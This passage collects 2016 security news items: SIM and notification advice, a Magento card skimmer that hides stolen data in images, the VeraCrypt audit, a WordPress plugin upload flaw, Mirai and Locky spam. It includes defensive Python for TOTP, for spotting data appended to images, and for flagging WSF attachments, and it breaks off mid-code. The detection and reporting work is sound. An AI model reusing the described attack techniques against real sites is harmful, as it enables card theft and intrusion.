a) Locked phone notifications

Allowing your smartphone to show notifications while locked is a great convenience. But at the same time, allowing them may represent a great risk to your privacy and security.

As shown in our experiment, this feature allowed us to read SMS and WhatsApp messages and, worse, answer them without unlocking the device.

We strongly recommend disabling “show notifications on your locked smartphone” (advice for users). Depending on your platform (Android or iOS) or app, there are different ways to configure this.

b) The ‘Sin’ Card

This episode reminded us how important it is to protect the SIM card. We all take care of locking our smartphones with strong passwords and fingerprint authentication, strong encryption and so on (don't we?), but we have to remember the importance of properly securing the SIM card.

As we could see in the experiments we did for this research, SMS is nowadays an important piece of transaction validation and authentication services. We used it to receive the Google unlock code, but it could be used to authenticate other kinds of transactions.

So, we recommend setting a PIN on your SIM card. That way, you considerably reduce the risk of impersonation if you lose your cell phone or have it stolen.

Depending on your smartphone, there are different ways to configure it. Remember that, after you set your SIM card PIN, you have to enter it every time you reboot your smartphone (which is not very convenient).


c) Two-factor authentication

Last but not least, please enable two-factor authentication on your accounts right now! Two-factor authentication means that you have to provide a combination of at least two methods to prove your identity to the system you are dealing with. The possible factors you can pick from are these three: something that you know, like a password; something that you have, like a hard or soft token; and something that you are, like your fingerprint.

Nowadays, almost all Internet services offer you the option to configure two-factor authentication – usually a password and a token. One option for the second factor is to have an SMS sent to you, but we know that this may be fragile. Preferably, choose an app, like Google Authenticator, to generate the token.

This strategy will strongly reduce the risk of unauthorized access to your account. If the victim of this incident had been using two-factor authentication, it would have been impossible to change their password using the SMS strategy.
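To make the difference between an SMS code and an authenticator app concrete, here is an added example (not part of the original article) of how an app like Google Authenticator derives its token and how a server verifies it: the code comes from a shared secret plus the clock, so a SIM card is never involved. The base32 secret and timestamps used in the comments are the RFC 6238 test vectors, not values from the incident.

```python
"""How an authenticator app derives its code and how a server checks it.

Added example, not from the original article: Google Authenticator and
similar apps implement TOTP (RFC 6238) on top of HOTP (RFC 4226). The code
is computed from a shared secret and the current time; nothing is sent
over SMS, so a stolen SIM card gives an attacker no second factor.
"""
import base64
import hashlib
import hmac
import struct

STEP_SECONDS = 30   # time step used by Google Authenticator
DIGITS = 6


def hotp(secret: bytes, counter: int, digits: int = DIGITS) -> str:
    """RFC 4226: HMAC-SHA1 over the 8-byte counter, dynamically truncated."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(secret: bytes, at: int, step: int = STEP_SECONDS) -> str:
    """RFC 6238: HOTP with the counter derived from Unix time."""
    return hotp(secret, at // step)


def secret_from_base32(enrolled: str) -> bytes:
    """Apps are enrolled with a base32 secret (the QR code payload)."""
    s = enrolled.replace(" ", "").upper()
    return base64.b32decode(s + "=" * (-len(s) % 8))


def verify_totp(secret: bytes, candidate: str, at: int,
                last_counter: int = -1, window: int = 1):
    """Server-side check. Returns the accepted counter, or None.

    Accepts the current step and +/- `window` neighbours for clock drift,
    compares in constant time, and refuses any counter at or below the
    last accepted one so a captured code cannot be replayed.
    """
    now = at // STEP_SECONDS
    for counter in range(now - window, now + window + 1):
        if counter <= last_counter:
            continue
        if hmac.compare_digest(hotp(secret, counter), candidate):
            return counter
    return None


if __name__ == "__main__":
    # RFC 6238 test secret ("12345678901234567890" in base32); at t=59 the
    # SHA1 vector is 94287082, i.e. "287082" as a 6-digit code.
    secret = secret_from_base32("GEZD GNBV GY3T QOJQ GEZD GNBV GY3T QOJQ")
    print(totp(secret, 59), verify_totp(secret, totp(secret, 59), 59))
```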

5. Final words

Given the short period of time between the theft and the accounts hacking process, we believe that this strategy is widely used to unlock lost and stolen devices.

Aside from the financial loss directly involved in having an iPhone lost or stolen, this case prompts an important reflection. Are we protecting our SIM cards and SMS messages as we should? The potential impact, like improper information access or disclosure in scenarios like the one in this article, could be even more devastating. Would it be overkill to compare an unlocked SIM card to an important password that you carry around every day, in clear text, attached to your smartphone?

Magento card-swiping malware hides stolen card data in legitimate images
19.10.2016 securityaffairs Virus

Security experts have spotted an interesting exfiltration technique adopted by crooks to exfiltrate card data from Magento platforms.
Security experts from Sucuri and RiskIQ have spotted an interesting exfiltration technique adopted by crooks to exfiltrate payment data from compromised e-commerce websites powered by the Magento platform.

Cybercriminals have been using image files to store and exfiltrate payment card data stolen from the targeted websites. This latest wave of attacks targeted over 100 online shops running on the Magento, Powerfront CMS and OpenCart e-commerce platforms.

Typically, attackers use card-swiping malware that steals credit card data from the Magento shop and exfiltrates it via email, or by storing it in a file that the attackers later retrieve.

Experts noticed an interesting attack on Magento shops in which cybercriminals have used a malicious PHP file that dumps stolen data into an image file.

Similar exfiltration techniques are common; however, attackers usually don’t use files containing real images to stage the information.

“This is not out of the ordinary. It is actually characteristic of a lot of the credit card swipers we have seen lately.” reads a blog post published by Sucuri.

“Attackers use image files as an obfuscation technique to hide stolen details from the website owner. The image file usually doesn’t contain a real image, however, no one really suspects an image file to contain malware. This gives the attacker a secret place to store data. If the attacker had chosen to store the stolen credit card details in a simple text file then it might be easier for someone to discover it and take steps to remove the hack.”

In this specific case, the images used to store the payment card data are real and belong to the products offered for sale on the compromised website. This technique allows attackers to remain under the radar and avoid raising any suspicion.

The stolen data is appended to the end of the image file in clear text, and the file is publicly accessible. According to Sucuri, the majority of the stolen card data came from the United States, but the files also include data related to victims from Japan, Turkey, Saudi Arabia and Canada.


“To obtain the stolen numbers the attacker would not even have to maintain access to the site. The image was publicly accessible. All the attacker would need to do is download the image from the website just like any other and view its source code.” continues the post.
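Because the stolen records are appended after a real image, a site owner can detect them by checking whether anything follows the image’s structural end. The following scanner is an added example (not Sucuri’s or RiskIQ’s code): it walks PNG chunks to IEND and JPEG markers to EOI and reports trailing bytes; the sample images and the appended record are constructed here, not taken from a real compromise.

```python
"""Find data appended past the structural end of a PNG or JPEG file.

Added example, not code from Sucuri or RiskIQ: the swiper described above
appends stolen card data in clear text to real product images, so a site
owner can scan the media directory for bytes after PNG's IEND chunk or
JPEG's EOI marker. Sample images and the appended text are constructed.
"""
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def png_end_offset(data: bytes) -> int:
    """Walk the chunk list and return the offset just past the IEND chunk."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        pos += 8 + length + 4                 # header + payload + CRC
        if ctype == b"IEND":
            return pos
    raise ValueError("no IEND chunk")


def jpeg_end_offset(data: bytes) -> int:
    """Walk the marker segments and return the offset just past EOI (FF D9).
    Inside a scan an FF is followed by 00 (stuffing) or D0-D7 (restart);
    any other byte after FF starts the next marker."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG")
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError("marker expected at offset %d" % pos)
        marker = data[pos + 1]
        if marker == 0xFF:                    # fill byte before a marker
            pos += 1
            continue
        if marker == 0xD9:                    # EOI
            return pos + 2
        if marker in (0xD8, 0x01) or 0xD0 <= marker <= 0xD7:
            pos += 2                          # standalone markers
            continue
        if pos + 4 > len(data):
            break
        pos += 2 + struct.unpack(">H", data[pos + 2:pos + 4])[0]
        if marker == 0xDA:                    # SOS: skip entropy-coded data
            while pos + 1 < len(data):
                nxt = data[pos + 1]
                if data[pos] == 0xFF and nxt != 0x00 and not 0xD0 <= nxt <= 0xD7:
                    break
                pos += 1
    raise ValueError("no EOI marker")


def trailing_data(data: bytes) -> bytes:
    """Return whatever follows the image's structural end (empty if clean)."""
    if data.startswith(PNG_SIG):
        return data[png_end_offset(data):]
    if data[:2] == b"\xff\xd8":
        return data[jpeg_end_offset(data):]
    raise ValueError("unsupported image type")


def looks_like_text(blob: bytes) -> bool:
    """Heuristic: mostly printable ASCII, as appended clear-text records are."""
    if not blob:
        return False
    printable = sum(1 for b in blob if 32 <= b < 127 or b in (9, 10, 13))
    return printable / len(blob) > 0.9


def scan_image(data: bytes) -> dict:
    """Triage summary: how many bytes trail the image and whether they are text."""
    tail = trailing_data(data)
    return {"trailing_bytes": len(tail), "text_like": looks_like_text(tail),
            "preview": tail[:48]}


# Constructed samples (not taken from any real compromise).
def make_png_1x1() -> bytes:
    """A valid 1x1 8-bit greyscale PNG built from scratch."""
    def chunk(ctype: bytes, body: bytes) -> bytes:
        crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
        return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00")         # filter byte + one pixel
    return PNG_SIG + chunk(b"IHDR", ihdr) + chunk(b"IDAT", idat) + chunk(b"IEND", b"")


def make_jpeg_skeleton() -> bytes:
    """SOI, APP0, SOS, entropy data (FF00 stuffing plus an RST0 marker), EOI.
    Structurally valid for the marker walk, not a decodable picture."""
    app0 = b"\xff\xe0" + struct.pack(">H", 4) + b"JF"
    sos = b"\xff\xda" + struct.pack(">H", 3) + b"\x01"
    return b"\xff\xd8" + app0 + sos + b"\x12\xff\x00\x34\xff\xd0\x56\xff\xd9"


# Constructed stand-in for an appended record, with obviously fake values.
SAMPLE_TAIL = b"\nCARD=0000000000000000|EXP=01/19|CVV=000|NAME=TEST USER\n"
```

Run `scan_image(open(path, "rb").read())` over every file in the shop’s media directory and review anything with a non-zero `trailing_bytes`, especially where `text_like` is true.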

Sucuri invites owners of websites powered by Magento to keep their CMS up to date and apply all the latest patches.

It also invites website administrators to use strong passwords.

VeraCrypt Audit Reveals Critical Security Flaws — Update Now
18.10.2016 thehackernews Vulnerebility
After TrueCrypt mysteriously discontinued its service, VeraCrypt became the most popular open source disk encryption software used by activists, journalists, as well as privacy conscious people.
First of all, there is no such thing as perfect, bug-free software.
Even the most rigorously tested software, like the ones that operate SCADA Systems, medical devices, and aviation software, have flaws.
Vulnerabilities are an unfortunate reality for every software product, but there is always space for improvements.
Due to the enormous popularity of VeraCrypt, security researchers from the OSTIF (The Open Source Technology Improvement Fund) agreed to audit VeraCrypt independently and hired researchers from QuarksLab in August to lead the audit.
And it seems like VeraCrypt is not exactly flawless either.
Now after one month of the audit, researchers have discovered a number of security issues, including 8 critical, 3 medium, and 15 low-severity vulnerabilities in the popular encryption platform VeraCrypt.
Quarkslab senior security researcher Jean-Baptiste Bédrune and senior cryptographer Marion Videau analyzed the VeraCrypt version 1.18 and the DCS EFI Bootloader 1.18 (UEFI), mainly focusing on new features introduced since last year's TrueCrypt security audit.
VeraCrypt file encryption software has been derived from the TrueCrypt project, but with enhancements to further secure your data.
"VeraCrypt is a project hard to maintain," researchers said. "Deep knowledge of several operating systems, the Windows kernel, the system boot chain and good concepts in cryptography are required. The improvements made by IDRIX demonstrate the possession of these skills."
The researchers have detailed all the vulnerabilities in a 42-page audit report [PDF], which includes:
Critical bugs in the implementation of GOST 28147-89, a symmetric block cipher with a 64-bit block size, which they say must be removed completely due to unsafe implementation.
All compression libraries are considered outdated or "poorly-written," and must be replaced with modern and more secure zip libraries.
If the system is encrypted, the boot password in UEFI mode or its length can be determined.
The majority of the flaws have been fixed in the latest VeraCrypt release, version 1.19, but a few of them, including the AES implementation, have not yet been patched because fixing them would require substantial modifications to the code and/or the architecture of the project.
So, according to the OSTIF, "VeraCrypt is much safer after this audit, and the fixes applied to the software mean that the world is safer when using this software."
You are recommended to download the latest VeraCrypt version 1.19.

British banks downplay security breaches
18.10.2016 securityaffairs Crime

Banks and financial institutions in the UK are reportedly failing to disclose the full extent of the security breaches they are experiencing.
UK banks are reportedly failing to disclose the full extent of the number and nature of security incidents they are experiencing, due to a fear of financial punishment and negative publicity.

Banking executives and security experts have stated that the banks are using grey areas in reporting structures in order to downplay the extent to which they are being targeted on a daily basis.

According to the UK’s financial regulation authority, the FSA, to which banks are obliged to report any incident, there were only a total of 75 incidents last year, as it stated last month.

This in itself is a marked increase from the declared 27 in 2015 and 5 in 2014. Any active member of the security industry will recognize these figures as incredibly low and unrealistic given the nature of today’s security and malware environment.

“Banks are dramatically under-reporting attacks, they do what’s legally required but out of embarrassment or fear of punishment they aren’t giving the whole picture,” was the claim from an anonymous source within the cyber security space of the banking sector.


Mark James, a security specialist from ESET, stated: “Reporting every one of those attempts would indeed clog systems with lots of unnecessary information and I’m sure there will be a lot that never makes the light of day.”

He went on to add “However, the problem of course is perceived security, as more and more breaches happen and more malware is being used to target financial systems, then the damage caused when things go wrong can be so great decisions will be made to keep it quiet. However, with the public becoming more aware of the damage caused by lapsed security, this may influence the decision on who is to look after their savings and daily finances in the future.”

These figures could be set to change, as the reporting parameters are expected to be tightened by the imminent EU General Data Protection Regulation (GDPR), which will introduce a mandatory reporting structure that all UK banks and lenders will be compelled to comply with.

This will require mandatory notification of security breaches within 72 hours and will introduce the possibility of fines of up to £18M GBP or 4% of annual turnover for what is deemed serious non-compliance or infractions.

Crooks exploit a zero-day in WordPress eCommerce Plugin to upload a backdoor
18.10.2016 securityaffairs Vulnerebility

Experts from White Fir Design discovered that cybercriminals exploited a zero-day flaw in an e-commerce plugin for WordPress to upload a backdoor.
According to the experts from the firm White Fir Design, crooks exploited a zero-day flaw in an e-commerce plugin for WordPress to upload backdoors to affected websites.

The plugin is WP Marketplace, a plugin for the popular WordPress CMS that implements e-commerce features. The plugin is not very popular, being installed on fewer than 500 websites worldwide, and the bad news is that it is no longer maintained, so the security holes will never be patched. WP Marketplace has not been updated in the last 8 months, and last week it was removed from the official WordPress Plugin Directory.

The experts noticed requests for a specific file belonging to WP Marketplace and concluded that attackers were scanning for websites running the plugin in order to exploit the flaw.

The issue is an arbitrary file upload vulnerability as explained by the experts.

“Within the last day we had a request for the file /wp-content/plugins/wpmarketplace/css/extends_page.css, which is part of the plugin WP Marketplace. Requesting a file from a plugin that isn’t installed on a website is usually indication that a hacker is probing for usage of it before exploiting something. We have also seen some requests for the file in the third-party data we monitor as well.” read the analysis published by White Fir Design. “Seeing as arbitrary file upload vulnerabilities are so likely to be exploited, one of the first things we look for when trying to determine what hackers might be exploiting in a plugin is that type of issue. In this case, we quickly found one. In the file /modules/additional-preview-images.php the function wpmp_upload_previews() is made accessible when loading admin pages (as the function is_admin() tells you that, not if the user is Administrator)”


Researchers from the security firm Sucuri also observed attack attempts in the wild and confirmed that cybercriminals have been exploiting the arbitrary file upload vulnerability to upload a backdoor to the affected websites.

“We checked our Website Firewall logs and confirmed that the WP Marketplace vulnerability is now a part of a hacker’s toolkit. When they detect sites with the installed plugin, they try to exploit the vulnerability and upload backdoors.” states a blog post published by Sucuri.

“Of course, it is not as valuable for hackers as vulnerabilities in popular plugins installed on every other site, but if your toolkit comprises hundreds of smaller vulnerabilities, the success rate will be comparable,” said Sucuri’s Denis Sinegubko. “That’s why plugin developers shouldn’t neglect best security practices even when developing small plugins.”

The experts from White Fir Design highlighted that the same development team also distributed other plugins, including WordPress Download Manager, which has been affected by a file upload flaw since at least June and is still unpatched.

Shadow Brokers launched a crowdfunding campaign to raise 10,000 bitcoins
18.10.2016 securityaffairs APT

The group calling itself The Shadow Brokers who hacked the NSA-linked Equation Group announced the launch of a crowdfunding campaign for the stolen arsenal.
This summer the hacker group Shadow Brokers hacked the NSA-linked group known as the Equation Group and leaked 300 Mb of hacking tools, exploits, and implants.

The Shadow Brokers launched an all-pay auction for the full archive containing the entire arsenal of the Equation Group. In early October, The Shadow Brokers complained that no one had offered money for their precious archive.


The auction received offers for less than two bitcoins, so the hacker group decided to launch a crowdfunding campaign.

The Shadow Brokers team had collected bids for a total of 1.76 bitcoins (roughly $1,100), but the dreaded team was expecting to earn as much as $1 million.

But probably we misunderstood the intent of the hackers because the hackers’ crowdfunding campaign aims to raise 10,000 bitcoins (roughly $6.4 million).

“TheShadowBrokers is being bored with auction so no more auction. Auction off. Auction finish. Auction done. No winners. So who is wanting password? TheShadowBrokers is publicly posting the password when receive 10,000 btc (ten thousand bitcoins). Same bitcoin address, same file, password is crowdfunding. Sharing risk. Sharing reward. Everyone winning.” reads the announcement published by the group.

But unfortunately, the crowdfunding campaign is not obtaining the expected results.

Who is behind the Shadow Brokers crew?

Some experts speculate that it is a group of Russian state-sponsored hackers; others believe it is a group of hackers who simply found the arsenal after it was mistakenly left unattended on a remote server by an employee or a contractor.

The Shadow Brokers then discovered the server and raided it.

“NSA officials have told investigators that an employee or contractor made the mistake about three years ago during an operation that used the tools, the people said.” Reuters reported.

“That person acknowledged the error shortly afterward, they said. But the NSA did not inform the companies of the danger when it first discovered the exposure of the tools, the sources said. Since the public release of the tools, the companies involved have issued patches in the systems to protect them.”

UK Police purchased IMSI-catcher technology for mobile surveillance
17.10.2016 securityaffairs Mobil

According to documents analyzed by The Bristol Cable media Agency, the UK authorities have purchased IMSI-catcher equipment.
Privacy advocates and rights groups are in revolt against the UK law enforcement that has purchased mobile phone snooping technology.

The rights groups are protesting against the adoption of the IMSI-catcher technology that could be used for dragnet surveillance.

An IMSI-catcher is a surveillance device used for intercepting mobile phone traffic and calls, tracking the movements of mobile phone users, and blocking phones from operating.

An IMSI catcher runs a Man in the Middle (MITM) attack acting as a bogus mobile cell tower that sits between the target mobile phone and the service provider’s real towers.

UK police have purchased this mobile phone snooping technology to track suspects’ devices and intercept their communications as part of their investigations.

The problem is that devices such as IMSI-catchers indiscriminately monitor all mobile devices in an area of up to 8 km, representing a serious threat to users’ privacy.

Rights groups are demanding transparency from the police about the use of surveillance technology.

According to the Bristol Cable, UK police are using Stingray equipment in their operations. Law enforcement has reportedly purchased “covert communications data capture” (CCDC) equipment from a UK firm, Cellxion.


“IMSI Covert Communications” that was earmarked £144,000. In the same budget the “CCDC” item was allocated at the same price, £144,000.

“South Yorkshire police confirmed that ‘CCDC’ and ‘IMSI Covert Communications’ are the same budget item.”

According to invoices obtained by the Cable, the local UK police paid Cellxion £169,575.00 for CCDC equipment, as well as for other “communications and computing equipment.”

“Suspicions have been raised in the past that IMSI-catchers are in use in the UK. These suspicions, until now, have focused on the Metropolitan Police’s purchase and use of the technology. Now, the Cable can exclusively reveal that at least five other forces appear to have contracted for IMSI-catchers, including Avon and Somerset (A&S) Constabulary.” revealed The Bristol Cable “This revelation comes from decrypting for the first time the acronym – CCDC, standing for covert communications data capture – in use by police forces across the country to obscure their apparent purchase of IMSI-catchers, and identifying police contracts with Cellxion, a firm that manufactures them.”

Privacy International advocacy officer Matthew Rice condemned the lack of transparency in the use of IMSI-catcher technology. Now that the acronyms used by the police are known, it is important to reveal how the surveillance technology is really used.

“While journalists and activists [have] spent time requesting information about IMSI-catchers… the real question we should have been asking our police forces was about the term CCDC (covert communications data capture),” he says.

“The longer the policy of denial of existence of these capabilities go on, the worse it is for police, citizens, and civil liberties in the United Kingdom,” he says.

It is still unclear whether the UK police and intelligence agencies have used IMSI-catchers and in which kind of operations.

The new TrickBot Banking Trojan seems to have been developed by Dyre authors
17.10.2016 securityaffairs Virus

Researchers at Fidelis Cybersecurity believe that someone behind the development of the Dyre banking Trojan is now behind the new Trickbot malware.
This morning I published a post on the data provided by Group-IB on crime trends; the report published by the security firm reveals a continuous evolution of the cybercriminal ecosystem. The story that I’m going to tell you confirms this rapid evolution: at least one of the authors behind the infamous Dyre banking Trojan (aka Dyreza) is apparently working on a new banking Trojan dubbed ‘TrickBot.’

The Dyreza botnet infected hundreds of thousands of machines worldwide; according to Heimdal Security, in November 2015 more than 80,000 machines had already been infected with the Dyre Trojan across the world. Security experts estimated that users of more than 1000 financial institutions had fallen victim to the threat.

In November 2015, Dyre activity ceased; Reuters also reported that authorities had raided the offices of a Russian film distribution and production company as part of an operation against the Dyre gang.

The operation by the Russian police successfully beheaded the organization behind the Dyre Trojan.

“We have seen a disruption over the last few months that is definitely consistent with successful law enforcement action,” explained security expert John Miller from iSight Partners.

Now security experts at Fidelis Cybersecurity believe that someone behind the development of the Dyre banking Trojan escaped arrest and is now participating in a new project.


Researchers at Fidelis Cybersecurity that are monitoring the evolution of the TrickBot malware speculate it has a strong connection to Dyre banking trojan.

The security firm first spotted the TrickBot malware in September while it was used by crooks to target the customers of Australian banks (ANZ, Westpac, St. George and NAB).

The first TrickBot samples analyzed by the experts were implementing a single data stealer module, but a few weeks later, the researchers discovered a new sample including webinjects that appear to be in the testing phase.

“In September 2016, Fidelis Cybersecurity was alerted to a new malware bot calling itself TrickBot that we believe has a strong connection to the Dyre banking trojan. From first glance at the loader, called TrickLoader, there are some striking similarities between it and the loader that Dyre commonly used. It isn’t until you decode out the bot, however, that the similarities become staggering.” reads the analysis published by Fidelis Cybersecurity.

“This would suggest, but is far from conclusive, that some individuals related to the development of Dyre have found their way into resuming criminal operations.”

TrickBot and Dyre have many similarities, the code of the new banking trojan seems to have been rewritten with a different coding style, but maintaining many functionalities.

TrickBot includes more C++ code than Dyre, which was mostly written in C. Another difference is that the new trojan leverages the Microsoft CryptoAPI instead of built-in routines for AES and SHA-256 hashing.

Below the main differences highlighted in the analysis:

Instead of running commands directly the bot interfaces with TaskScheduler through COM for persistence
Instead of running an onboard SHA256 hashing routine or AES routine the bot utilizes Microsoft CryptoAPI
There is considerably more code in the C++ programming language versus the original Dyre that used C for the most part.
“Based on these observations, it is our assessment with strong confidence that there is a clear link between Dyre and TrickBot but that there is considerable new development that has been invested into TrickBot. With moderate confidence, we assess that one or more of the original developers of Dyre is involved with TrickBot.” states the post.

The analysis of the custom crypter revealed that the malware loader (TrickLoader) is the same one used by other malware such as Vawtrak, Pushdo and Cutwail. Cutwail is associated with the spambot used by the threat actor behind Dyre, which suggests that the cybercriminals are trying to rebuild the Cutwail botnet.

For further information, take a look at the post, which includes a full list of IOCs and hashes.

‘Adult’ video for Facebook users
17.10.2016 Kaspersky Social
In April of this year, we registered some mass attacks on Facebook users in Russia. As a result, many Russian-speaking users of the social network fell victim to fraudsters. Half a year later the fraudsters have used the same tactics to attack Facebook users in Europe.

The attackers use a compromised Facebook account to post a link to an adult video that is supposedly hosted on the popular YouTube service. In order to attract potential victims, “likes” are added from the account holder’s list of friends. The fraudsters rely on the user or their friends being curious enough to want to watch an “18+” video.


Clicking on the link opens a page made to look like YouTube.


However, a quick look at the address bar is enough to see that the page has nothing to do with YouTube. During the latest attack the fraudsters distributed a “video” located on the xic.graphics domain. The domain is not currently available, but we discovered more than 140 domains with the same registration data that could be used for similar purposes.
After trying to start the video, a pop-up banner appears prompting the user to install a browser extension. In this particular example, it was called ‘Profesjonalny Asystent’ (Professional assistant), but we also came across other names.


The “View details” message explains that if the extension is not installed, the video cannot be viewed.

The attackers are banking on an intrigued victim not being interested in the details and just installing the extension. As a result, the extension gains rights to read all the data in the browser, which the fraudsters can later use to get all the passwords, logins, credit card details and other confidential user information that is entered. The extension can also continue spreading links to itself on Facebook, but now in your name and among your friends.

We strongly recommend not clicking such links and not installing suspicious browser extensions. It’s also worth checking if any suspicious extensions have already been installed. If any are discovered, they should be immediately removed via the browser settings, and the passwords for sites that are visited most often, especially online banking, should be changed.

The Mirai botnet is targeting also Sierra Wireless cellular data gear products
16.10.2016 securityaffairs BotNet

Sierra Wireless is warning its customers to change the factory credentials of its AirLink gateway communications products due to Mirai attacks.
Sierra Wireless is warning its customers to change the factory credentials of its AirLink gateway communications products.

The company is aware of a significant number of infections caused by the Mirai malware, a threat specifically designed to compromise poorly configured IoT devices.

The malware was first spotted in August by MalwareMustDie, who analyzed samples of this new ELF trojan backdoor. The malware takes its name from the binary, “mirai.*”, and according to the experts several attacks have been detected in the wild.

The Mirai malware scans the web searching for connected devices such as DVRs and IP-enabled cameras that use default or hard-coded credentials.


Back to the Sierra Wireless alert: the company is warning its customers of Mirai attacks against the AirLink Cellular Gateway devices (LS300, GX400, GX/ES440, GX/ES450 and RV50).

“Sierra Wireless has confirmed reports of the ‘Mirai’ malware infecting AirLink gateways that are using the default ACEmanager password and are reachable from the public internet. The malware is able to gain access to the gateway by logging into ACEmanager with the default password and using the firmware update function to download and run a copy of itself,” Sierra Wireless wrote in a security bulletin. “Devices attached to the gateway’s local area network may also be vulnerable to infection by the Mirai malware.”

The Mirai botnet was involved in a number of severe attacks; according to the experts, it powered the DDoS attacks against the website of the security journalist Brian Krebs and against the hosting provider OVH, the latter reaching 1 Tbps.

Unfortunately, the number of malware families specifically designed to infect IoT systems continues to increase. This week, Security Affairs published an exclusive on the discovery of a new threat, dubbed NyaDrop, by experts at MalwareMustDie.

“There is evidence that ‘Internet of Things’-type devices have been infected with the Linux malware Mirai, which attackers used in the recent DDoS attacks against the web site Krebs on Security,” reads a security bulletin published by the US ICS-CERT.

US is thinking of a possible cyber strike against the Kremlin
16.10.2016 securityaffairs Cyber

The US Government is thinking of a possible cyber strike against the Kremlin in response to the alleged interference with the 2016 presidential election.
A few days ago the US Government formally accused the Russian Government of trying to interfere with the 2016 presidential election.

Washington is officially accusing Russia of trying to interfere with the 2016 US presidential election, announcing that it will adopt all necessary countermeasures to defeat the threat.

The Office of the Director of National Intelligence and the Department of Homeland Security have issued a joint security statement to accuse the Russian government of a series of intrusions into the networks of US organizations and state election boards involved in the Presidential Election.

“The U.S. Intelligence Community (USIC) is confident that the Russian Government directed the recent compromises of e-mails from US persons and institutions, including from US political organizations. The recent disclosures of alleged hacked e-mails on sites like DCLeaks.com and WikiLeaks and by the Guccifer 2.0 online persona are consistent with the methods and motivations of Russian-directed efforts. These thefts and disclosures are intended to interfere with the US election process” reads the statement.

“We will take action to protect our interests, including in cyberspace, and we will do so at a time and place of our choosing,” a senior administration official told AFP.

“The public should not assume that they will necessarily know what actions have been taken or what actions we will take.”

On Friday, US Vice President Joe Biden explained in an interview with NBC that a "message" would be sent to Russian President Vladimir Putin over the alleged hacking.

“Vice President Joe Biden told ‘Meet the Press’ moderator Chuck Todd on Friday that ‘we’re sending a message’ to Putin and that ‘it will be at the time of our choosing, and under the circumstances that will have the greatest impact,’” reported NBC News.

“When asked if the American public will know a message was sent, the vice president replied, ‘Hope not.’”

According to NBC, the CIA was preparing a retaliatory cyber attack “designed to harass and ’embarrass’ the Kremlin leadership.”

“The Obama administration is contemplating an unprecedented cyber covert action against Russia in retaliation for alleged Russian interference in the American presidential election,” reads the NBC News report.

But what does it mean to plan a covert operation while diplomats publicly promise retaliation? Clearly, US politicians are using the cyber threat as a deterrent against further initiatives by the Kremlin.

These statements are useless, since both governments are already conducting covert operations against each other, and history is full of examples.

According to NBC News, the sources did not elaborate on the tactics the CIA was considering, but said US intelligence is already selecting targets and making other preparations for a cyber operation.

Former intelligence officers explained that the CIA is likely working on a PSYOP, gathering reams of documents that could expose “unsavory tactics” by President Vladimir Putin.


On the other side, the Russian Government denies any interference in the 2016 presidential election. Kremlin spokesman Dmitry Peskov replied to Biden’s statements saying that his government would take precautions to protect itself from the “unpredictability and aggressiveness of the United States.”

“The threats directed against Moscow and our state’s leadership are unprecedented because they are voiced at the level of the US vice president,” reported the Russian RIA Novosti news agency.

“To the backdrop of this aggressive, unpredictable line, we must take measures to protect (our) interests, to hedge risks.”

Intelligence analysts believe that the two governments will intensify their operations in cyberspace. The Russian diplomat Yuri Ushakov vowed that Moscow would respond to any cyber attack launched by Washington.

Ushakov declared that the Kremlin will consider any such attack a “borderline insolence.”

Why are Russian hackers interfering with the 2016 election?

According to some experts, the Kremlin aims to favor Donald Trump, who has been praised by Vladimir Putin. Relations between Russia and the US were exacerbated by the invasion of Crimea and by Russian support for the Syrian government.

Symantec observed a surge of spam emails using malicious WSF files
16.10.2016 securityaffairs Spam

Symantec observed a significant increase in the number of email-based attacks using malicious Windows Script File (WSF) attachments.
Experts from Symantec are observing a significant increase in the number of email-based attacks leveraging malicious Windows Script File (WSF) attachments. Over the past three months the tactic has been adopted by threat actors in the wild, mostly the criminal groups behind ransomware campaigns.

“In the past two weeks, Symantec has blocked a number of major campaigns distributing Locky (Ransom.Locky) which involved malicious WSF files.” reads a blog post from Symantec.

A Windows Script File (WSF) is an XML-based file type that allows mixing scripting languages, such as JScript and VBScript (and any other installed Windows Script engine, such as Python), within a single file.

WSF files are opened and executed by the Windows Script Host (WSH) and can be launched like an ordinary executable file: double-clicking one runs it.

Symantec highlighted that .wsf files are not automatically blocked by some email clients. Threat actors have used malicious WSF files in a number of recent major spam campaigns spreading ransomware such as Locky.

Symantec blocked more than 1.3 million emails bearing the subject line “Travel Itinerary” between October 3 and 4. In this campaign, the attackers used malicious emails purporting to come from a major airline, with a WSF file inside a .zip archive attached.

Symantec added that on October 5, the same threat actor launched a new massive spam campaign with the subject line “complaint letter.”

“Symantec blocked more than 918,000 of these emails. The email purported to come from someone representing a client who was making a complaint “regarding the data file you provided.” Once again, the emails came with an attachment that consisted of a WSF file within a .zip archive. If the WSF file was allowed to run, Locky was installed on the victim’s computer.” added Symantec.
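A quick way to see what these campaigns rely on: a .wsf is plain XML whose <script language="..."> elements select the script engine, Windows runs it on double-click, and a mail gateway that only inspects the outer .zip never sees the extension. The following Python is an added example (not Symantec's tooling) that opens an attachment in memory, descends into zip archives, flags Windows Script Host extensions, and lists the engines a WSF declares; the "Travel_Itinerary.pdf.wsf" attachment and its harmless script body are constructed for the demonstration.

```python
"""Flag e-mail attachments carrying Windows Script Files (.wsf), including
WSF files nested inside .zip archives, and report the script engines a WSF
declares. Added example, not Symantec's tooling; the attachment built by
build_sample_zip() is constructed for the demonstration."""
import io
import re
import zipfile
from typing import Dict, List, Optional

# Extensions the Windows Script Host (or mshta) executes on double-click. The
# campaigns above used .wsf; any of these in unsolicited mail is a red flag.
SCRIPT_EXTENSIONS = {".wsf", ".js", ".jse", ".vbs", ".vbe", ".wsh", ".hta"}

# A WSF is XML. Each <script language="..."> element selects a script engine,
# which is what lets a single file mix JScript and VBScript.
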